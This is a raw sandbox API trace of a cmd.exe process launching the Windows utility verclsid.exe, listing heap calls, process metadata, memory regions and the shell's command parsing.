[0380.752] GetProcessHeap () returned 0x80000
[0380.752] GetProcessHeap () returned 0x80000
[0380.752] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9baa0) returned 1
[0380.752] GetProcessHeap () returned 0x80000
[0380.752] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9baa0) returned 0x18
[0380.752] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9baa0 | out: hHeap=0x80000) returned 1
[0380.752] GetProcessHeap () returned 0x80000
[0380.753] GetProcessHeap () returned 0x80000
[0380.753] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95ab0) returned 1
[0380.753] GetProcessHeap () returned 0x80000
[0380.753] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95ab0) returned 0x20
[0380.753] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95ab0 | out: hHeap=0x80000) returned 1
[0380.753] GetProcessHeap () returned 0x80000
[0380.753] GetProcessHeap () returned 0x80000
[0380.753] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95ae0) returned 1
[0380.753] GetProcessHeap () returned 0x80000
[0380.753] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95ae0) returned 0x20
[0380.754] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95ae0 | out: hHeap=0x80000) returned 1
[0380.754] GetProcessHeap () returned 0x80000
[0380.754] GetProcessHeap () returned 0x80000
[0380.754] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95b10) returned 1
[0380.754] GetProcessHeap () returned 0x80000
[0380.754] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95b10) returned 0x20
[0380.754] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95b10 | out: hHeap=0x80000) returned 1
[0380.754] GetProcessHeap () returned 0x80000
[0380.755] GetProcessHeap () returned 0x80000
[0380.755] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95b40) returned 1
[0380.755] GetProcessHeap () returned 0x80000
[0380.755] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95b40) returned 0x20
[0380.755] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95b40 | out: hHeap=0x80000) returned 1
[0380.755] GetProcessHeap () returned 0x80000
[0380.755] GetProcessHeap () returned 0x80000
[0380.755] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9bac0) returned 1
[0380.755] GetProcessHeap () returned 0x80000
[0380.755] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9bac0) returned 0x18
[0380.756] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9bac0 | out: hHeap=0x80000) returned 1
[0380.756] GetProcessHeap () returned 0x80000
[0380.756] GetProcessHeap () returned 0x80000
[0380.756] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95b70) returned 1
[0380.756] GetProcessHeap () returned 0x80000
[0380.756] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95b70) returned 0x20
[0380.756] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95b70 | out: hHeap=0x80000) returned 1
[0380.756] GetProcessHeap () returned 0x80000
[0380.756] GetProcessHeap () returned 0x80000
[0380.756] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95c00) returned 1
[0380.756] GetProcessHeap () returned 0x80000
[0380.756] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95c00) returned 0x20
[0380.757] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95c00 | out: hHeap=0x80000) returned 1
[0380.757] GetProcessHeap () returned 0x80000
[0380.757] GetProcessHeap () returned 0x80000
[0380.757] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95c60) returned 1
[0380.757] GetProcessHeap () returned 0x80000
[0380.757] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95c60) returned 0x20
[0380.757] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95c60 | out: hHeap=0x80000) returned 1
[0380.757] GetProcessHeap () returned 0x80000
[0380.757] GetProcessHeap () returned 0x80000
[0380.757] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95cc0) returned 1
[0380.758] GetProcessHeap () returned 0x80000
[0380.758] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95cc0) returned 0x20
[0380.758] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95cc0 | out: hHeap=0x80000) returned 1
[0380.758] GetProcessHeap () returned 0x80000
[0380.758] GetProcessHeap () returned 0x80000
[0380.758] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95cf0) returned 1
[0380.758] GetProcessHeap () returned 0x80000
[0380.758] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95cf0) returned 0x20
[0380.759] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95cf0 | out: hHeap=0x80000) returned 1
[0380.759] GetProcessHeap () returned 0x80000
[0380.759] GetProcessHeap () returned 0x80000
[0380.759] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cb80) returned 1
[0380.759] GetProcessHeap () returned 0x80000
[0380.759] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cb80) returned 0x20
[0380.759] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cb80 | out: hHeap=0x80000) returned 1
[0380.759] GetProcessHeap () returned 0x80000
[0380.759] GetProcessHeap () returned 0x80000
[0380.759] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cbb0) returned 1
[0380.759] GetProcessHeap () returned 0x80000
[0380.759] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cbb0) returned 0x20
[0380.760] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cbb0 | out: hHeap=0x80000) returned 1
[0380.760] GetProcessHeap () returned 0x80000
[0380.760] GetProcessHeap () returned 0x80000
[0380.760] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cbe0) returned 1
[0380.760] GetProcessHeap () returned 0x80000
[0380.760] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cbe0) returned 0x20
[0380.760] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cbe0 | out: hHeap=0x80000) returned 1
[0380.760] GetProcessHeap () returned 0x80000
[0380.760] GetProcessHeap () returned 0x80000
[0380.761] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9bae0) returned 1
[0380.761] GetProcessHeap () returned 0x80000
[0380.761] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9bae0) returned 0x18
[0380.763] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9bae0 | out: hHeap=0x80000) returned 1
[0380.763] GetProcessHeap () returned 0x80000
[0380.763] GetProcessHeap () returned 0x80000
[0380.763] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95c30) returned 1
[0380.763] GetProcessHeap () returned 0x80000
[0380.763] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95c30) returned 0x20
[0380.763] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95c30 | out: hHeap=0x80000) returned 1
[0380.763] GetProcessHeap () returned 0x80000
[0380.763] GetProcessHeap () returned 0x80000
[0380.763] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9ba60) returned 1
[0380.764] GetProcessHeap () returned 0x80000
[0380.764] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9ba60) returned 0x18
[0380.764] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9ba60 | out: hHeap=0x80000) returned 1
[0380.764] exit (_Code=0)
Thread:
id = 106
os_tid = 0xd14
Process:
id = "16"
image_name = "cmd.exe"
filename = "c:\\windows\\system32\\cmd.exe"
page_root = "0x75017000"
os_pid = "0x194"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "14"
os_parent_pid = "0xd08"
cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c start \"\" verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} & Exit"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2215
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2216
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2217
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2218
start_va = 0x150000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 2219
start_va = 0x4aa90000
end_va = 0x4aae8fff
monitored = 1
entry_point = 0x4aa990b4
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")
Region:
id = 2220
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2221
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2222
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2223
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2224
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2225
start_va = 0x7fffffd3000
end_va = 0x7fffffd3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 2226
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 2227
start_va = 0x250000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 2228
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2229
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2230
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2231
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2232
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2233
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2234
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2235
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2236
start_va = 0x7fefb8b0000
end_va = 0x7fefb8b7fff
monitored = 0
entry_point = 0x7fefb8b11a0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 2237
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2238
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2239
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2240
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2241
start_va = 0x3f0000
end_va = 0x4cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2242
start_va = 0x4d0000
end_va = 0x5cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 2243
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2244
start_va = 0x5d0000
end_va = 0x757fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005d0000"
filename = ""
Region:
id = 2245
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2246
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2247
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2248
start_va = 0x760000
end_va = 0x8e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000760000"
filename = ""
Region:
id = 2249
start_va = 0x8f0000
end_va = 0x1ceffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008f0000"
filename = ""
Region:
id = 2250
start_va = 0xc0000
end_va = 0xdffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cmd.exe.mui"
filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")
Region:
id = 2251
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 2252
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Thread:
id = 110
os_tid = 0x81c
[0382.432] GetProcAddress (hModule=0x77660000, lpProcName="SetConsoleInputExeNameW") returned 0x77670c80
[0382.433] GetProcessHeap () returned 0x2f0000
[0382.433] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4012) returned 0x30c610
[0382.433] GetProcessHeap () returned 0x2f0000
[0382.434] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30c610 | out: hHeap=0x2f0000) returned 1
[0382.435] _wcsicmp (_String1="start", _String2=")") returned 74
[0382.435] _wcsicmp (_String1="FOR", _String2="start") returned -13
[0382.435] _wcsicmp (_String1="FOR/?", _String2="start") returned -13
[0382.435] _wcsicmp (_String1="IF", _String2="start") returned -10
[0382.435] _wcsicmp (_String1="IF/?", _String2="start") returned -10
[0382.435] _wcsicmp (_String1="REM", _String2="start") returned -1
[0382.435] _wcsicmp (_String1="REM/?", _String2="start") returned -1
[0382.435] GetProcessHeap () returned 0x2f0000
[0382.435] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0) returned 0x309e40
[0382.435] GetProcessHeap () returned 0x2f0000
[0382.436] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1c) returned 0x304740
[0382.442] GetProcessHeap () returned 0x2f0000
[0382.442] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x94) returned 0x309f00
[0382.444] GetProcessHeap () returned 0x2f0000
[0382.444] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0) returned 0x309fa0
[0382.445] _wcsicmp (_String1="Exit", _String2=")") returned 60
[0382.445] _wcsicmp (_String1="FOR", _String2="Exit") returned 1
[0382.445] _wcsicmp (_String1="FOR/?", _String2="Exit") returned 1
[0382.445] _wcsicmp (_String1="IF", _String2="Exit") returned 4
[0382.445] _wcsicmp (_String1="IF/?", _String2="Exit") returned 4
[0382.445] _wcsicmp (_String1="REM", _String2="Exit") returned 13
[0382.445] _wcsicmp (_String1="REM/?", _String2="Exit") returned 13
[0382.445] GetProcessHeap () returned 0x2f0000
[0382.445] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0) returned 0x30a060
[0382.445] GetProcessHeap () returned 0x2f0000
[0382.446] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1a) returned 0x304770
[0382.450] GetConsoleTitleW (in: lpConsoleTitle=0x24f670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0382.451] _wcsicmp (_String1="start", _String2="DIR") returned 15
[0382.451] _wcsicmp (_String1="start", _String2="ERASE") returned 14
[0382.452] _wcsicmp (_String1="start", _String2="DEL") returned 15
[0382.452] _wcsicmp (_String1="start", _String2="TYPE") returned -1
[0382.452] _wcsicmp (_String1="start", _String2="COPY") returned 16
[0382.452] _wcsicmp (_String1="start", _String2="CD") returned 16
[0382.452] _wcsicmp (_String1="start", _String2="CHDIR") returned 16
[0382.452] _wcsicmp (_String1="start", _String2="RENAME") returned 1
[0382.452] _wcsicmp (_String1="start", _String2="REN") returned 1
[0382.452] _wcsicmp (_String1="start", _String2="ECHO") returned 14
[0382.452] _wcsicmp (_String1="start", _String2="SET") returned 15
[0382.452] _wcsicmp (_String1="start", _String2="PAUSE") returned 3
[0382.452] _wcsicmp (_String1="start", _String2="DATE") returned 15
[0382.452] _wcsicmp (_String1="start", _String2="TIME") returned -1
[0382.452] _wcsicmp (_String1="start", _String2="PROMPT") returned 3
[0382.452] _wcsicmp (_String1="start", _String2="MD") returned 6
[0382.452] _wcsicmp (_String1="start", _String2="MKDIR") returned 6
[0382.452] _wcsicmp (_String1="start", _String2="RD") returned 1
[0382.453] _wcsicmp (_String1="start", _String2="RMDIR") returned 1
[0382.453] _wcsicmp (_String1="start", _String2="PATH") returned 3
[0382.453] _wcsicmp (_String1="start", _String2="GOTO") returned 12
[0382.453] _wcsicmp (_String1="start", _String2="SHIFT") returned 12
[0382.453] _wcsicmp (_String1="start", _String2="CLS") returned 16
[0382.453] _wcsicmp (_String1="start", _String2="CALL") returned 16
[0382.453] _wcsicmp (_String1="start", _String2="VERIFY") returned -3
[0382.453] _wcsicmp (_String1="start", _String2="VER") returned -3
[0382.453] _wcsicmp (_String1="start", _String2="VOL") returned -3
[0382.453] _wcsicmp (_String1="start", _String2="EXIT") returned 14
[0382.453] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15
[0382.453] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14
[0382.453] _wcsicmp (_String1="start", _String2="TITLE") returned -1
[0382.453] _wcsicmp (_String1="start", _String2="START") returned 0
[0382.454] GetProcessHeap () returned 0x2f0000
[0382.454] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x118) returned 0x30a120
[0382.466] GetProcessHeap () returned 0x2f0000
[0382.466] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x30a120, Size=0x98) returned 0x30a120
[0382.466] GetProcessHeap () returned 0x2f0000
[0382.466] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x30a120) returned 0x98
[0382.468] GetProcessHeap () returned 0x2f0000
[0382.468] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xa0) returned 0x30a1d0
[0382.469] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0382.469] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0382.469] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0382.471] _wcsicmp (_String1="verclsid.exe", _String2="DIR") returned 18
[0382.471] _wcsicmp (_String1="verclsid.exe", _String2="ERASE") returned 17
[0382.471] _wcsicmp (_String1="verclsid.exe", _String2="DEL") returned 18
[0382.471] _wcsicmp (_String1="verclsid.exe", _String2="TYPE") returned 2
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="COPY") returned 19
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="CD") returned 19
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="CHDIR") returned 19
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="RENAME") returned 4
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="REN") returned 4
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="ECHO") returned 17
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="SET") returned 3
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="PAUSE") returned 6
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="DATE") returned 18
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="TIME") returned 2
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="PROMPT") returned 6
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="MD") returned 9
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="MKDIR") returned 9
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="RD") returned 4
[0382.472] _wcsicmp (_String1="verclsid.exe", _String2="RMDIR") returned 4
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="PATH") returned 6
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="GOTO") returned 15
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="SHIFT") returned 3
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="CLS") returned 19
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="CALL") returned 19
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="VERIFY") returned -6
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="VER") returned 99
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="VOL") returned -10
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="EXIT") returned 17
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="SETLOCAL") returned 3
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="ENDLOCAL") returned 17
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="TITLE") returned 2
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="START") returned 3
[0382.473] _wcsicmp (_String1="verclsid.exe", _String2="DPATH") returned 18
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="KEYS") returned 11
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="MOVE") returned 9
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="PUSHD") returned 6
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="POPD") returned 6
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="ASSOC") returned 21
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="FTYPE") returned 16
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="BREAK") returned 20
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="COLOR") returned 19
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="MKLINK") returned 9
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="FOR") returned 16
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="IF") returned 13
[0382.474] _wcsicmp (_String1="verclsid.exe", _String2="REM") returned 4
[0382.475] _wcsnicmp (_String1="verc", _String2="cmd ", _MaxCount=0x4) returned 19
[0382.476] GetProcessHeap () returned 0x2f0000
[0382.476] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x420) returned 0x2f1320
[0382.476] SetErrorMode (uMode=0x0) returned 0x0
[0382.476] SetErrorMode (uMode=0x1) returned 0x0
[0382.476] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2f1330, lpFilePart=0x232a60 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x232a60*="system32") returned 0x13
[0382.476] SetErrorMode (uMode=0x0) returned 0x1
[0382.476] GetProcessHeap () returned 0x2f0000
[0382.476] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x2f1320, Size=0x52) returned 0x2f1320
[0382.477] GetProcessHeap () returned 0x2f0000
[0382.477] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f1320) returned 0x52
[0382.477] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4aabf360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0382.477] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0382.478] GetProcessHeap () returned 0x2f0000
[0382.478] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1ce) returned 0x2f1390
[0382.478] GetProcessHeap () returned 0x2f0000
[0382.478] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x38c) returned 0x2f1570
[0382.483] GetProcessHeap () returned 0x2f0000
[0382.483] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x2f1570, Size=0x1d0) returned 0x2f1570
[0382.483] GetProcessHeap () returned 0x2f0000
[0382.483] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f1570) returned 0x1d0
[0382.483] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aabf360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0382.483] GetProcessHeap () returned 0x2f0000
[0382.483] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xe8) returned 0x30a280
[0382.483] GetProcessHeap () returned 0x2f0000
[0382.483] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x30a280, Size=0x7e) returned 0x30a280
[0382.483] GetProcessHeap () returned 0x2f0000
[0382.483] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x30a280) returned 0x7e
[0382.484] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0382.484] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\verclsid.exe" (normalized: "c:\\windows\\system32\\verclsid.exe"), fInfoLevelId=0x1, lpFindFileData=0x2327d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2327d0) returned 0x308600
[0382.484] GetProcessHeap () returned 0x2f0000
[0382.484] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x28) returned 0x3047a0
[0382.484] FindClose (in: hFindFile=0x308600 | out: hFindFile=0x308600) returned 1
[0382.485] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2
[0382.485] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3
